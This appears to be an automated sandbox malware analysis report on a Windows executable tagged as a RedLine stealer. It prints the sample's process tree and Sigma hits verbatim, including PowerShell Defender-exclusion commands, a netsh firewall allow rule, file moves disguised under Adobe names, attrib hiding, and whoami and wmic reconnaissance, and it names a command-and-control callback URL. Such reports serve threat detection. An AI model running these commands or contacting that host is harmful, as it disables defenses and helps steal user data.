Loading ...

Play interactive tourEdit tour

Windows Analysis Report 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe

Overview

General Information

Sample Name:5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
Analysis ID:553368
MD5:8fb77edbae0c40e1e19d82a406b7615a
SHA1:0d1580519970aadaae7a4771bba39668ac0c583f
SHA256:5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e170063a684e21bcf078
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Sigma detected: Copying Sensitive Files with Credential Data
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Sigma detected: Suspicious Script Execution From Temp Folder
Uses netsh to modify the Windows network and firewall settings
Uses cmd line tools excessively to alter registry or file data
Modifies the hosts file
Uses known network protocols on non-standard ports
Sigma detected: CobaltStrike Process Patterns
Sigma detected: Powershell Defender Exclusion
Uses whoami command line tool to query computer and username
Uses ipconfig to lookup or modify the Windows network settings
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Modifies the windows firewall
Sigma detected: Whoami Execution Anomaly
Creates files inside the driver directory
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Netsh Port or Application Allowed
Queries disk information (often used to detect virtual machines)
Sigma detected: Whoami Execution
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe (PID: 4356 cmdline: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)
    • cmd.exe (PID: 6516 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3200 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)
      • powershell.exe (PID: 1068 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)
    • cmd.exe (PID: 7072 cmdline: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 3336 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • cmd.exe (PID: 3180 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • whoami.exe (PID: 2132 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
    • cmd.exe (PID: 5556 cmdline: cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • netsh.exe (PID: 2056 cmdline: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes MD5: 98CC37BBF363A38834253E22C80A8F32)
    • cmd.exe (PID: 5792 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • whoami.exe (PID: 5268 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 6312 cmdline: cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 2328 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 5572 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp MD5: 95000560239032BC68B4C2FDFCDEF913)
        • cmd.exe (PID: 6068 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 5580 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 1904 cmdline: cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6636 cmdline: reg add "HKCU\Software\Mystic Entertainment" /f MD5: E3DACF0B31841FA02064B4457D44B357)
            • conhost.exe (PID: 4348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • WMIC.exe (PID: 2828 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • cmd.exe (PID: 5544 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 3200 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 6300 cmdline: cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • attrib.exe (PID: 6780 cmdline: attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • cmd.exe (PID: 5848 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 1068 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)
        • cmd.exe (PID: 6636 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 6868 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • WMIC.exe (PID: 4488 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • cmd.exe (PID: 6628 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 3696 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 3076 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 5684 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 7080 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 5792 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 3312 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4896 cmdline: cmd /C "ipconfig //flushdns" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 924 cmdline: ipconfig //flushdns MD5: C7FAFF418EF7AD7ABDA10A5BCF9B53EB)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • whoami.exe (PID: 5872 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
    • cmd.exe (PID: 4232 cmdline: cmd /Q /C reg add "HKCU\Software\Mystic Entertainment" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1860 cmdline: reg add "HKCU\Software\Mystic Entertainment" /f MD5: E3DACF0B31841FA02064B4457D44B357)
    • cmd.exe (PID: 3952 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 7120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6732 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 2504 cmdline: cmd /Q /C move /Y C:\Windows\acrotray.exe C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 924 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • cmd.exe (PID: 4632 cmdline: cmd /Q /C reg add "HKCU\Software\Trion Softworks" /f MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6152 cmdline: reg add "HKCU\Software\Trion Softworks" /f MD5: E3DACF0B31841FA02064B4457D44B357)
        • cmd.exe (PID: 5968 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 5952 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 5648 cmdline: cmd /C "attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • attrib.exe (PID: 6504 cmdline: attrib +S +H C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)
        • cmd.exe (PID: 4360 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • powershell.exe (PID: 2924 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)
        • cmd.exe (PID: 5116 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • WMIC.exe (PID: 6780 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • cmd.exe (PID: 7116 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 3932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • WMIC.exe (PID: 5964 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • cmd.exe (PID: 4624 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 1904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 7084 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • WMIC.exe (PID: 1760 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
        • cmd.exe (PID: 6632 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 1244 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 6788 cmdline: cmd /C whoami MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • whoami.exe (PID: 6036 cmdline: whoami MD5: AA18BE1AD24DE09417C1A7459F5C1701)
        • cmd.exe (PID: 5756 cmdline: cmd /C "wmic cpu get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 4488 cmdline: wmic cpu get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • cmd.exe (PID: 7076 cmdline: cmd /C "attrib +S +H C:\Windows\acrotray.exe" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • conhost.exe (PID: 7080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5092 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • attrib.exe (PID: 5556 cmdline: attrib +S +H C:\Windows\acrotray.exe MD5: FDC601145CD289C6FBC96D3F805F3CD7)
    • cmd.exe (PID: 2956 cmdline: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5616 cmdline: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft MD5: 95000560239032BC68B4C2FDFCDEF913)
    • cmd.exe (PID: 6328 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • WMIC.exe (PID: 2328 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • cmd.exe (PID: 5624 cmdline: cmd /C ver MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4768 cmdline: cmd /C "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • acrotray.exe (PID: 7120 cmdline: "C:\Windows\acrotray.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)
  • acrotray.exe (PID: 5268 cmdline: "C:\Windows\acrotray.exe" MD5: 8FB77EDBAE0C40E1E19D82A406B7615A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Copying Sensitive Files with Credential DataShow sources
Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, CommandLine: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" , ParentImage: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, ParentProcessId: 4356, ProcessCommandLine: cmd /Q /C move /Y C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe C:\Windows\acrotray.exe, ProcessId: 7072
Sigma detected: Suspicious Script Execution From Temp FolderShow sources
Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, ProcessId: 1068
Sigma detected: CobaltStrike Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: cmd /C whoami, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 5536
Sigma detected: Powershell Defender ExclusionShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe" , ParentImage: C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe, ParentProcessId: 4356, ProcessCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ProcessId: 6516
Sigma detected: Whoami Execution AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: ipconfig //flushdns, ParentImage: C:\Windows\System32\ipconfig.exe, ParentProcessId: 924, ProcessCommandLine: whoami, ProcessId: 5872
Sigma detected: Netsh Port or Application AllowedShow sources
Source: Process startedAuthor: Markus Neis, Sander Wiebing: Data: Command: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, CommandLine: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: cmd /C "netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5556, ProcessCommandLine: netsh advfirewall firewall add rule name=\"acrotray\" dir=in action=allow program=\"C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe\" enable=yes, ProcessId: 2056
Sigma detected: Whoami ExecutionShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: whoami, CommandLine: whoami, CommandLine|base64offset|contains: , Image: C:\Windows\System32\whoami.exe, NewProcessName: C:\Windows\System32\whoami.exe, OriginalFileName: C:\Windows\System32\whoami.exe, ParentCommandLine: cmd /C whoami, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3180, ProcessCommandLine: whoami, ProcessId: 2132
Sigma detected: Hiding Files with Attrib.exeShow sources
Source: Process startedAuthor: Sami Ruohonen: Data: Command: attrib +S +H C:\Windows\acrotray.exe, CommandLine: attrib +S +H C:\Windows\acrotray.exe, CommandLine|base64offset|contains: jk, Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: cmd /C "attrib +S +H C:\Windows\acrotray.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7076, ProcessCommandLine: attrib +S +H C:\Windows\acrotray.exe, ProcessId: 5556
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /C "powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6516, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp, ProcessId: 1068
Sigma detected: T1086 PowerShell ExecutionShow sources
Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866898925142279.1068.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeVirustotal: Detection: 20%Perma Link
Source: 5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exeReversingLabs: Detection: 39%
Antivirus detection for URL or domainShow sources
Source: http://185.112.83.96:20000/callbackAvira URL Cloud: Label: malware
Source: http://185.112.83.96:20000/callbackmheap.freeSpanLockedAvira URL Cloud: Label: malware

Networking:

barindex
Uses known network protocols on non-standard portsShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 20000
Source: unknownNetwork traffic detected: HTTP traffic on port 20000 -> 49751
Source: global trafficTCP traffic: 192.168.2.3:49750 -> 185.112.83.96:60601
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.96
